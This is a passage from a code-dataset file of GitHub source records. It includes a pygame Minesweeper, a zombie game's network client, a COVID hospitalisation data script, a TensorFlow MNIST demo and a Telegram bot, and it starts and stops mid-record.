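# (added note) the four cell borders as point pairs: top above this comment,\n            # then left, bottom, right below; pygame's y-axis grows downward\n            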
[(pos[0], pos[1]), (pos[0], pos[1] + length)],\n            [(pos[0], pos[1] + length), (pos[0] + length, pos[1] + length)],\n            [(pos[0] + length, pos[1]), (pos[0] + length, pos[1] + length)]\n        ]\n\n        self.fj_pos = []\n\n        self.num = \"0\"\n        self.print = self.num\n        self.status = 0\n        self.weeper = False\n\n        self.get_fj_pos()\n\n    def get_fj_pos(self):\n        for _fj in fj:\n            c_x = self.pos[0] + _fj[0] * length\n            c_y = self.pos[1] + _fj[1] * length\n\n            if not (c_x < 0 or c_y < 0 or c_x >= max_width or c_y >= max_height):\n                self.fj_pos.append(f\"{c_x}-{c_y}\")\n\n    def for_screen(self):\n        # Draw the cell rectangle\n        rect = (self.pos[0] + 1, self.pos[1] + 1, length - 1, length - 1)\n        pygame.draw.rect(screen, \"#98F5FF\", rect, width=0)\n\n        # Draw the count of nearby mines\n        if self.num in \"12345678\" or True:\n            surface = font.render(self.print, False, \"#8B0000\")\n            screen.blit(surface, (self.pos[0] + length // 4, self.pos[1]))\n\n    def del_for_screen(self):\n        # Draw the cell rectangle\n        rect = (self.pos[0] + 1, self.pos[1] + 1, length - 1, length - 1)\n        pygame.draw.rect(screen, \"black\", rect, width=0)\n\n\n# Place the mines\ndef set_weeper(ge_lis: dict):\n    pos_lis = list(ge_lis.keys())\n\n    for _ in range(len(pos_lis) // 6):\n        new_wp_index = random.randint(0, len(pos_lis) - 1)\n        new_wp_pos = pos_lis.pop(new_wp_index)\n        ge_lis[new_wp_pos].weeper = True\n        ge_lis[new_wp_pos].num = \"!\"\n        ge_lis[new_wp_pos].print = \"!\"\n        weeper_lis.append(new_wp_pos)\n\n\n# Set the neighbouring-mine count for every cell\ndef get_num(ge_lis: dict):\n    for pos, ge in ge_lis.items():\n        if ge.weeper:\n            continue\n\n        num = 0\n        for c_pos in ge.fj_pos:\n            c_ge = ge_lis.get(c_pos)\n            if c_ge and c_ge.weeper:\n                num += 1\n\n        ge.num = str(num)\n        ge.print = str(num)\n\n\n# Reveal a cell\ndef click_weeper(pos: str, ge_lis: dict):\n    cur_ge = ge_lis.get(pos)\n\n    if cur_ge.status != 0:\n        return\n\n    if cur_ge.num == \"0\":\n        cur_ge.status = 1\n\n        for _ge_pos in cur_ge.fj_pos:\n            click_weeper(_ge_pos, ge_lis)\n\n    elif cur_ge.num in \"12345678\":\n        cur_ge.status = 1\n\n    elif cur_ge.num == \"!\":\n        GLOBAL_VUL[\"over\"] = True\n\n    cur_ge.for_screen()\n\n\n# Toggle a flag on a cell\ndef this_is_weeper(pos: str, ge_lis: dict):\n    cur_ge = ge_lis.get(pos)\n\n    if cur_ge.status == 0:\n        cur_ge.status = 2\n        cur_ge.print = \"*\"\n\n        if pos in weeper_lis and cur_ge.weeper:\n            weeper_lis.remove(pos)\n\n        is_weeper_lis.append(pos)\n        cur_ge.for_screen()\n    elif cur_ge.status == 1:\n        return\n    elif cur_ge.status == 2:\n        cur_ge.status = 0\n        cur_ge.print = cur_ge.num\n\n        if pos not in weeper_lis:\n            weeper_lis.append(pos)\n\n        is_weeper_lis.remove(pos)\n        cur_ge.del_for_screen()\n","repo_name":"wisdomowl704/PyOr","sub_path":"Minesweeper/weeper.py","file_name":"weeper.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"72568451961","text":"import threading\nimport urllib\nimport urllib.parse\nimport urllib.error\nimport urllib.request\nimport urllib.response\nimport json\nimport time\nimport os\n\"\"\"\nMethod to add a new TODO file with command in it\n\"\"\"\ndef addCommandToQueue(command):\n\tfileName = os.getcwd() + \"/TODO/task_queue_\" + str(time.time())\n\tf = open(fileName,\"w\")\n\tf.write(command)\n\tf.close()\n\ndef addCommandsToQueue(commands):\n\tfileName = os.getcwd() + \"/TODO/task_queue_\" + str(time.time())\n\tf = open(fileName,\"w\")\n\tfor command in commands:\n\t\tf.write(command)\n\tf.close()\n\t\n\nclass NetworkHandler(threading.Thread):\n\tdef __init__(self,url,password):\n\t\tthreading.Thread.__init__(self)\n\t\tself._commands = []\n\t\tself._url = url\n\t\tself._password = 
password\n\t\tself._running = False\n\t\tself._userdata = {}\n\t\tself._splitter = \"/%%:\"\n\t\n\tdef run(self):\n\t\tself._running = True\n\t\t#Long poll for updates\n\t\twhile self._running:\n\t\t\ttry:\n\t\t\t\tupdates = self.post({'command':'getUpdates'})\n\t\t\t\tjdata = json.loads(updates)\n\t\t\t\tfor update in jdata:\n\t\t\t\t\tself._commands.append(update['command'].strip())\n\t\t\texcept Exception:#Ignore transient network/JSON errors and keep polling\n\t\t\t\tpass\n\t\t\ttime.sleep(3)\n\n\tdef post(self,rawData):\n\t\t\trawData['password'] = self._password\n\t\t\tdata = json.dumps(rawData)\n\t\t\turl = urllib.request.Request(self._url,data.encode())\n\t\t\turl.add_header(\"Content-Type\",\"application/json\")\n\t\t\tdata = urllib.request.urlopen(url, timeout=10).read().decode('utf8', 'ignore')\n\t\t\treturn data\n\tdef loadUserData(self):\n\t\tif os.path.exists(os.getcwd() + \"/userdata.txt\")==False:#Download if absent\n\t\t\tself.downloadUserData()\t\n\t\t#Load File\n\t\tf = open(os.getcwd() + \"/userdata.txt\",\"r\")\n\t\tline = f.readline()\n\t\twhile len(line) > 0:\n\t\t\tdetails = line.split(self._splitter)\n\t\t\tself._userdata[details[0]] = {'username':details[1],'studentnum':details[2],'cellphone':details[3]}\n\t\t\tline = f.readline()\n\t\tf.close()\n\n\tdef downloadUserData(self):\n\t\tuserDataJson = self.getUserData()\n\t\tuserMap = json.loads(userDataJson)\n\t\ttoWrite = \"\"\n\t\tfor user in userMap:\n\t\t\tif user != 'success':\n\t\t\t\tdetails = userMap[user]\n\t\t\t\ttoWrite += \"{1}{0}{2}{0}{3}{0}{4}\\n\".format(self._splitter,details['USERID'],details['USERNAME'],details['STUDENTNUMBER'],details['CELLNUMBER'])\n\t\tnewFile = open(os.getcwd() + \"/userdata.txt\",\"w\")\n\t\tnewFile.write(toWrite)\n\t\tnewFile.close()\n\n\tdef getUserDetail(self,userID,detail):\n\t\tif len(self._userdata) == 0:#Check if file loaded\n\t\t\tself.loadUserData()\n\t\tif not userID in self._userdata:#If user doesn't exist and old file then redownload\n\t\t\tself.downloadUserData()\n\t\tif not userID in self._userdata:#If user doesn't exist\n\t\t\treturn userID\n\t\telse:#User exists\n\t\t\treturn self._userdata[userID][detail]\n\n\tdef findValue(self,m,val,detail):\n\t\tfound = False\n\t\tfor key in m:\n\t\t\tif val in m[key][detail]:\n\t\t\t\tfound = True\n\t\treturn found\n\n\tdef findUserDetails(self,value,detail):\n\t\tif len(self._userdata) == 0:#Check if file loaded\n\t\t\tself.loadUserData()\n\t\tif not self.findValue(self._userdata,value,detail):#If user doesn't exist and old file then redownload\n\t\t\tself.downloadUserData()\n\t\tif not self.findValue(self._userdata,value,detail):#If user doesn't exist, return the sentinel checked by callers\n\t\t\treturn 'unknown'\n\t\telse:#User exists\n\t\t\tfor key in self._userdata:\n\t\t\t\tif value in self._userdata[key][detail]:\n\t\t\t\t\treturn key\n\t\treturn 'unknown'\n\n\n\t\n\n\tdef getUsername(self,userID):\n\t\treturn self.getUserDetail(userID,'username')\n\tdef getCellphone(self,userID):\n\t\treturn self.getUserDetail(userID,'cellphone')\n\tdef getStudentNumber(self,userID):\n\t\treturn self.getUserDetail(userID,'studentnum')\n\tdef getUserIDByCell(self,cell):\n\t\treturn self.findUserDetails(cell,'cellphone')\n\tdef getLeaderboard(self,userID):\n\t\tdata = self.post({'command':'getLeaderboard'})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ self.sanitiseUserID(userID) +\"~~Could not load the leaderboard.\"\n\t\t\t+\" Try the website if the problem persists.\")\n\t\telse:\n\t\t\taddCommandToQueue(\"sendleaderboard~~\"+ userID +\"~~\" + data)\n\tdef 
sanitiseUserID(self,userID):\n\t\t\tif '+27' in userID:\n\t\t\t\tuserID = \"0\"+userID[3:]\n\t\t\t\tuserID = self.getUserIDByCell(userID)\n\t\t\tif userID == 'unknown':\n\t\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Could not find your user code. Please use the website.\")\n\t\t\t\tuserID = 'a385cac'\n\t\t\treturn userID\n\n\tdef getStatus(self,userID):\n\t\tdata = self.post({'command':'getUserStatus','userID':self.sanitiseUserID(userID)})\n\t\tjsondata = json.loads(data);\n\t\tif jsondata['success'] != True:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Error: Could not get your details.\"\n\t\t\t+\" Try the website if the problem persists.\")\n\t\telse:\n\t\t\taddCommandToQueue(\"sendstatus~~\"+ userID +\"~~\"+data)\n\n\tdef getUserData(self):\n\t\treturn self.post({'command':'getUserData'})\n\t\n\tdef kill(self,userID, victimID):\n\t\tdata = self.post({'command':'kill','killerID':self.sanitiseUserID(userID),'victimID':self.sanitiseUserID(victimID)})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Could not kill that user.\"\n\t\t\t+jsondata['reason']\n\t\t\t+\". Try the website if the problem persists.\")\n\t\n\t\n\tdef claim(self,userID, claimID):\n\t\tdata = self.post({'command':'claim','userID':self.sanitiseUserID(userID),'code':claimID})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Your claim failed, \" + jsondata['reason']\n\t\t\t+\". Try claim it on the website if the problem persists.\")\n\n\tdef getLiving(self,userID):\n\t\tdata = self.post({'command':'getLiving'})\n\t\taddCommandToQueue(\"sendliving~~\"+ userID +\"~~\"+data)\n\t\n\tdef stop(self):\n\t\tself._running = False\n\n\tdef getCommands(self):\n\t\tret = self._commands\n\t\tself._commands = []\t\n\t\treturn ret\n\n\t\n\t\t\nif __name__ == '__main__':\n\tcfgFile = open(os.getcwd() + \"/Config.cfg\", \"r\")\n\tconfig = {}\n\tfor line in cfgFile:\n\t\tparts = line.strip().split(\"=\")\n\t\tconfig[parts[0]] = parts[1]\n\tnet = NetworkHandler(config['phpUrl'],config['phpPassword'])\n\tnet.start()\n\tprint(net.getUserIDByCell('845810628'))\n\t\n","repo_name":"lDisciple/MetaZombies","sub_path":"Mobile/networkHandler.py","file_name":"networkHandler.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73003850359","text":"from expression import *\nclass Regle:\n def __init__(self,id=0,premisses=None,conclusion=''):\n # keep the constructor arguments; premisses defaults to a fresh list so instances never share state,\n # and conclusion stays a string because __str__ concatenates it\n self.id = id\n self.premisses = premisses if premisses is not None else []\n self.conclusion = conclusion\n def __str__(self):\n toReturn='id--'+str(self.id)+'--prem--'\n for prem in self.premisses :\n toReturn+=(prem+'--')\n toReturn+=('--conc--'+self.conclusion)\n return toReturn\n\nclass Fait:\n def __init__(self, fait=None):\n self.fait = fait\n","repo_name":"dhia-e-rzig/FwChainingNoConflict","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14558197464","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: karlen\n\"\"\"\nimport numpy as np\nimport datetime\nfrom datetime import timedelta\n\nt0 = datetime.date(2020,3,1)\n\nregional_abbreviations = {\n 'Austria': 'AT',\n 'Belgium': 'BE',\n 'Bulgaria': 'BG',\n 'Croatia': 'HR',\n 'Cyprus': 'CY',\n 'Czechia': 'CZ',\n 'Denmark': 'DK',\n 'Estonia': 'EE',\n 'Finland': 'FI',\n 'France': 'FR',\n 'Germany': 'DE',\n 
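# ISO 3166-1 alpha-2 codes, continued; the map covers EU members plus EEA countries and the UK\n 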
'Greece': 'GR',\n 'Hungary': 'HU',\n 'Iceland': 'IS',\n 'Ireland': 'IE',\n 'Italy': 'IT',\n 'Latvia': 'LV',\n 'Liechtenstein': 'LI',\n 'Lithuania': 'LT',\n 'Luxembourg': 'LU',\n 'Malta': 'MT',\n 'Netherlands': 'NL',\n 'Norway': 'NO',\n 'Poland': 'PL',\n 'Portugal': 'PT',\n 'Romania': 'RO',\n 'Slovakia': 'SK',\n 'Slovenia': 'SI',\n 'Spain': 'ES',\n 'Sweden': 'SE',\n 'Switzerland': 'CH',\n 'United Kingdom': 'GB'\n}\n\n# Starting Nov 8 2021, multiple sources: daily scraped.csv, daily non-eu, weekly for remaining\ndata_by_state = {}\nlast_date_by_state = {}\n\n# Starting Oct 9 2022, ECDC data stale, use OWID repo and UK data to continue updating data\nowid_start_date = datetime.date(2022, 9, 4)\nowid_states = ['BE', 'FR', 'IE', 'NO', 'CH']\nuk_start_date = datetime.date(2022, 9, 4)\n\nraw_files = ['scraped.csv','non-eu.csv']\ndate_fields = [3,2]\nvalue_fields = [4,3]\n\nrecord_date = None\nfor j,raw_file in enumerate(raw_files):\n with open(raw_file) as f:\n for i,line in enumerate(f):\n if i > 0:\n fields = line.split(',')\n if j>0 or fields[2] == 'New_Hospitalised':\n df = fields[date_fields[j]].split('-')\n record_date = datetime.date(int(df[0]),int(df[1]),int(df[2]))\n state = fields[1]\n value = int(fields[value_fields[j]])\n\n if state not in data_by_state:\n data_by_state[state] = {}\n data_by_state[state][t0] = 0\n last_date_by_state[state] = t0\n if record_date <= t0:\n data_by_state[state][t0] += value\n else:\n data_by_state[state][record_date] = value\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\nprint('Daily hospitalization data taken in scraped.csv and non-eu.csv up to (last date):')\nraw_states = []\nbad_states = []\nfor state in data_by_state:\n print(state, last_date_by_state[state])\n #if raw data is out of date, do not use it\n if (datetime.date.today()-last_date_by_state[state]).days > 120:\n print(state,' ** raw data not used ** too old')\n bad_states.append(state)\n else:\n raw_states.append(state)\n\nfor state in bad_states:\n del data_by_state[state]\n del last_date_by_state[state]\n\n# use OWID data to fill in values, starting from owid_start_date\n# OWID is 7 day sum (typically updated daily) so that daily admissions can be extracted\n# Otherwise use weekly values to update\n\nowid_file = 'covid-hospitalizations.csv'\n\nlast_state = ''\nlast_date = ''\nseven_day_buffer = []\nwith open(owid_file) as f:\n for i, line in enumerate(f):\n if i > 0:\n fields = line.strip().split(',')\n if fields[3] == 'Weekly new hospital admissions':\n country = fields[0]\n if country in regional_abbreviations:\n state = regional_abbreviations[country]\n if state != last_state:\n seven_day_buffer = []\n last_state = state\n if state in owid_states:\n df = fields[2].split('-')\n record_date = datetime.date(int(df[0]), int(df[1]), int(df[2]))\n if record_date == owid_start_date:\n last_date = record_date\n seven_day_buffer = []\n for day_offset in range(-6,1,1):\n date = record_date + timedelta(days=day_offset)\n value = data_by_state[state][date]\n seven_day_buffer.append(value)\n elif record_date > owid_start_date:\n value = int(float(fields[4]))\n if (record_date-last_date).days == 1:\n new_admin = value - int(np.sum(seven_day_buffer[1:]))\n data_by_state[state][record_date] = new_admin\n seven_day_buffer = seven_day_buffer[1:] + [new_admin]\n last_date = record_date\n else:\n if len(seven_day_buffer) == 0:\n seven_day_buffer = []\n for day_offset in range(-6, 1, 1):\n date = record_date + timedelta(days=day_offset)\n value = 
data_by_state[state][date]\n seven_day_buffer.append(value)\n days = (record_date-last_date).days\n new_admin = value - np.sum(seven_day_buffer[days:])\n daily = int(new_admin / days)\n extra = new_admin % days\n for iday in range(days):\n date = record_date - timedelta(days=iday)\n data_by_state[state][date] = daily\n if iday < extra:\n data_by_state[state][date] += 1\n last_date = record_date\n\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\n# use weekly data for the rest: split across days of week\necdc_file = 'truth_ECDC-Incident Hospitalizations.csv'\n\ndate_error = None\nrecord_date = None\nwith open(ecdc_file) as f:\n for i,line in enumerate(f):\n if i > 0:\n fields = line.split(',')\n df = fields[2].split('-')\n record_date = datetime.date(int(df[0]),int(df[1]),int(df[2]))\n state = fields[1]\n value = int(fields[3])\n\n if record_date.weekday() != 5:\n if date_error is None: # remember the first weekly record that does not fall on a Saturday\n date_error = state + ' : ' + record_date.isoformat()\n\n if state not in raw_states:\n\n if state not in data_by_state:\n data_by_state[state] = {}\n data_by_state[state][t0] = 0\n last_date_by_state[state] = t0\n if record_date <= t0:\n data_by_state[state][t0] += value\n else:\n daily = int(value/7)\n extra = value%7\n for iday in range(7):\n date = record_date - timedelta(days=iday)\n data_by_state[state][date] = daily\n if iday < extra:\n data_by_state[state][date] += 1\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\nif date_error is not None:\n print(' *** Error in weekly data:',date_error)\n\nprint('Weekly Hospitalization data provided up to (last date):')\nlast_date = t0\nfor state in data_by_state:\n if last_date_by_state[state]>last_date:\n last_date = last_date_by_state[state]\n if state not in raw_states:\n print(state, last_date_by_state[state])\n\nwith open('eu-ecdc-pypm.csv', 'w') as the_file:\n\n data_started = {}\n previous_value = {}\n hbuff = ['date']\n for country in regional_abbreviations:\n state = regional_abbreviations[country]\n hbuff.append(state + '-hd')\n the_file.write(','.join(hbuff) + '\\n')\n\n the_date = datetime.date(2020,3,1)\n while the_date <= last_date:\n buff = [the_date.isoformat()]\n for country in regional_abbreviations:\n state = regional_abbreviations[country]\n value = ''\n if state in data_by_state:\n if the_date in data_by_state[state]:\n if state not in data_started:\n data_started[state] = True\n value = str(data_by_state[state][the_date])\n previous_value[state] = value\n elif data_started[state]:\n value = previous_value[state]\n buff.append(value)\n\n the_file.write(','.join(buff) + '\\n')\n the_date += timedelta(days=1)\n","repo_name":"pypm/data","sub_path":"covid19/EU/make_ecdc_csv.py","file_name":"make_ecdc_csv.py","file_ext":"py","file_size_in_byte":8780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19197963421","text":"from setuptools import setup, find_packages\n\nrequirements = [\n 'percy',\n 'robotframework',\n 'robotframework-selenium2library',\n]\n\nsetup(\n name='robot-framework-percy',\n version='0.1',\n description='Robot framework Percy client',\n url='https://github.com/Minh0001/robot-framework-percy',\n author='Minh Le',\n author_email='quangminh0001@gmail.com',\n license='MIT',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n zip_safe=False,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 
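# additional trove classifiers from https://pypi.org/classifiers/ could be listed here\n 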
],\n)\n","repo_name":"Minh0001/robot-framework-percy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16660604780","text":"\"\"\"\nCOMP.CS.100: Fibonacci\nTekijä: Erkka Lehtoranta\nOpiskelijanumero: *SECRET*\nDescription: A program printing the Fibonacci sequence to a user specified end.\n\"\"\"\n\n\ndef main():\n end: int = int(input('How many Fibonacci numbers do you want? '))\n first = 0\n second = fib = 1\n\n i = 1\n while i <= end:\n print(f'{i}. {fib}')\n fib = first + second\n first = second\n second = fib\n i += 1\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elehtoranta/CS100","sub_path":"2_loops/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29748904690","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nfrom beholder.beholder import Beholder\n\nFLAGS = None\n\nLOG_DIRECTORY = '/tmp/beholder-demo'\n\ndef train():\n mnist = input_data.read_data_sets(FLAGS.data_dir,\n one_hot=True,\n fake_data=FLAGS.fake_data)\n\n sess = tf.InteractiveSession()\n\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32, [None, 784], name='x-input')\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\n\n with tf.name_scope('input_reshape'):\n image_shaped_input = tf.reshape(x, [-1, 28, 28, 1])\n tf.summary.image('input', image_shaped_input, 10)\n\n def weight_variable(shape):\n \"\"\"Create a weight variable with appropriate initialization.\"\"\"\n initial = tf.truncated_normal(shape, stddev=0.01)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n \"\"\"Create a bias variable with appropriate initialization.\"\"\"\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):\n \"\"\"Reusable code for making a simple neural net layer.\n\n It does a matrix multiply, bias add, and then uses ReLU to nonlinearize.\n It also sets up name scoping so that the resultant graph is easy to read,\n and adds a number of summary ops.\n \"\"\"\n # Adding a name scope ensures logical grouping of the layers in the graph.\n with tf.name_scope(layer_name):\n # This Variable will hold the state of the weights for the layer\n with tf.name_scope('weights'):\n weights = weight_variable([input_dim, output_dim])\n variable_summaries(weights)\n with tf.name_scope('biases'):\n biases = bias_variable([output_dim])\n variable_summaries(biases)\n with tf.name_scope('Wx_plus_b'):\n preactivate = tf.matmul(input_tensor, weights) + biases\n tf.summary.histogram('pre_activations', preactivate)\n activations = act(preactivate, 
name='activation')\n tf.summary.histogram('activations', activations)\n return activations\n\n #conv1\n kernel = tf.Variable(tf.truncated_normal([5, 5, 1, 10], dtype=tf.float32,\n stddev=1e-1), name='conv-weights')\n conv = tf.nn.conv2d(image_shaped_input, kernel, [1, 1, 1, 1], padding='VALID')\n biases = tf.Variable(tf.constant(0.0, shape=[kernel.get_shape().as_list()[-1]], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(out, name='relu')\n\n #conv2\n kernel2 = tf.Variable(tf.truncated_normal([3, 3, 10, 20], dtype=tf.float32,\n stddev=1e-1), name='conv-weights2')\n conv2 = tf.nn.conv2d(conv1, kernel2, [1, 1, 1, 1], padding='VALID')\n biases2 = tf.Variable(tf.constant(0.0, shape=[kernel2.get_shape().as_list()[-1]], dtype=tf.float32),\n trainable=True, name='biases')\n out2 = tf.nn.bias_add(conv2, biases2)\n conv2 = tf.nn.relu(out2, name='relu')\n\n flattened = tf.contrib.layers.flatten(conv2)\n\n\n # hidden1 = nn_layer(x, x.get_shape().as_list()[1], 10, 'layer1')\n hidden1 = nn_layer(flattened, flattened.get_shape().as_list()[1], 10, 'layer1')\n\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n tf.summary.scalar('dropout_keep_probability', keep_prob)\n dropped = tf.nn.dropout(hidden1, keep_prob)\n\n y = nn_layer(dropped, 10, 10, 'layer2', act=tf.identity)\n\n with tf.name_scope('cross_entropy'):\n diff = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y)\n with tf.name_scope('total'):\n cross_entropy = tf.reduce_mean(diff)\n tf.summary.scalar('cross_entropy', cross_entropy)\n\n with tf.name_scope('train'):\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n gradients, train_step = Beholder.gradient_helper(optimizer, cross_entropy)\n\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(LOG_DIRECTORY + '/train', sess.graph)\n test_writer = tf.summary.FileWriter(LOG_DIRECTORY + '/test')\n tf.global_variables_initializer().run()\n\n visualizer = Beholder(session=sess,\n logdir=LOG_DIRECTORY)\n\n\n def feed_dict(train):\n if train or FLAGS.fake_data:\n xs, ys = mnist.train.next_batch(100, fake_data=FLAGS.fake_data)\n k = FLAGS.dropout\n else:\n xs, ys = mnist.test.images, mnist.test.labels\n k = 1.0\n return {x: xs, y_: ys, keep_prob: k}\n\n for i in range(FLAGS.max_steps):\n # if i % 10 == 0: # Record summaries and test-set accuracy\n summary, acc = sess.run([merged, accuracy], feed_dict=feed_dict(False))\n test_writer.add_summary(summary, i)\n print('Accuracy at step %s: %s' % (i, acc))\n # else: # Record train set summaries, and train\n # if i % 100 == 99: # Record execution stats\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n # summary, _ = sess.run([merged, train_step],\n # feed_dict=feed_dict(True),\n # options=run_options,\n # run_metadata=run_metadata)\n # train_writer.add_run_metadata(run_metadata, 'step%03d' % i)\n # train_writer.add_summary(summary, i)\n # print('Adding run metadata for', i)\n # else: # Record a summary\n print('i', i)\n feed_dictionary = feed_dict(True)\n summary, gradient_arrays, activations, _ = sess.run([merged, gradients, [image_shaped_input, conv1, conv2, hidden1, y], train_step], 
feed_dict=feed_dictionary)\n first_of_batch = sess.run(x, feed_dict=feed_dictionary)[0].reshape(28, 28)\n\n visualizer.update(\n arrays=activations + [first_of_batch] + gradient_arrays,\n frame=first_of_batch,\n )\n train_writer.add_summary(summary, i)\n\n train_writer.close()\n test_writer.close()\n\ndef main(_):\n if not tf.gfile.Exists(LOG_DIRECTORY):\n tf.gfile.MakeDirs(LOG_DIRECTORY)\n train()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--fake_data', nargs='?', const=True, type=bool,\n default=False,\n help='If true, uses fake data for unit testing.')\n parser.add_argument('--max_steps', type=int, default=1000000,\n help='Number of steps to run trainer.')\n parser.add_argument('--learning_rate', type=float, default=0.001,\n help='Initial learning rate')\n parser.add_argument('--dropout', type=float, default=0.9,\n help='Keep probability for training dropout.')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='/tmp/tensorflow/mnist/input_data',\n help='Directory for storing input data')\n parser.add_argument(\n '--log_dir',\n type=str,\n default='/tmp/tensorflow/mnist/logs/mnist_with_summaries',\n help='Summaries log directory')\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"chrisranderson/beholder","sub_path":"beholder/demos/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":8105,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"40"} +{"seq_id":"25749409916","text":"import telebot\nfrom telebot import types\n\nimport env\nimport users\nimport tasks\n\nbot = telebot.TeleBot(env.token)\nuser = None\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n global user\n user_id = str(message.from_user.id)\n user = users.get_user(user_id)\n if user.id != '0':\n bot.send_message(user_id, 'Привет, '+user.get_name())\n show_main_menu(user_id)\n else:\n user.id = user_id\n sent = bot.send_message(user_id, 'Давай знакомиться! Как тебя зовут?')\n bot.register_next_step_handler(sent, lambda m: acquaint(m, user_id))\n\n\ndef show_main_menu(user_id):\n markup = generate_main_menu_markup()\n bot.send_message(user_id, text='Начнем игру?', reply_markup=markup)\n\n\ndef generate_main_menu_markup():\n list_items = ['Начать игру', 'Настройки']\n markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n for item in list_items:\n markup.add(item)\n return markup\n\n\ndef acquaint(message, user_id):\n global user\n user_name = message.text\n user.name = user_name\n sex_keyboard = types.InlineKeyboardMarkup()\n key_male = types.InlineKeyboardButton(text='Мужской', callback_data='set_sex_male')\n sex_keyboard.add(key_male)\n key_female = types.InlineKeyboardButton(text='Женский', callback_data='set_sex_female')\n sex_keyboard.add(key_female)\n bot.send_message(user_id, text='Привет, '+user_name+'!\\nТвой пол', reply_markup=sex_keyboard)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_worker(call):\n global user\n user_id = str(call.from_user.id)\n if call.data == \"set_sex_male\":\n user.sex = 'male'\n sent = bot.send_message(user_id, 'Отлично! Как зовут твоего партнера?')\n bot.register_next_step_handler(sent, lambda m: set_partner_name(m, user_id))\n elif call.data == \"set_sex_female\":\n user.sex = 'female'\n sent = bot.send_message(user_id, 'Отлично! 
Как зовут твоего партнера?')\n        bot.register_next_step_handler(sent, lambda m: set_partner_name(m, user_id))\n\n\ndef set_partner_name(message, user_id):\n    global user\n    user.partner_name = message.text\n    user.save()\n    show_main_menu(user_id)\n\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n    if message.text == \"Начать игру\":\n        start_game(str(message.from_user.id))\n    elif message.text == \"Настройки\":\n        show_settings(str(message.from_user.id))\n    elif message.text == \"Зеленый уровень\":\n        user.level = 'green'\n        user.update(str(message.from_user.id))\n        start_tasks(str(message.from_user.id))\n    elif message.text == \"Желтый уровень\":\n        user.level = 'yellow'\n        user.update(str(message.from_user.id))\n        start_tasks(str(message.from_user.id))\n    elif message.text == \"Красный уровень\":\n        user.level = 'red'\n        user.update(str(message.from_user.id))\n        start_tasks(str(message.from_user.id))\n    elif message.text == \"Главное меню\":\n        show_main_menu(str(message.from_user.id))\n    else:\n        bot.send_message(message.from_user.id, \"Я тебя не понимаю. Напиши /help.\")\n\n\ndef 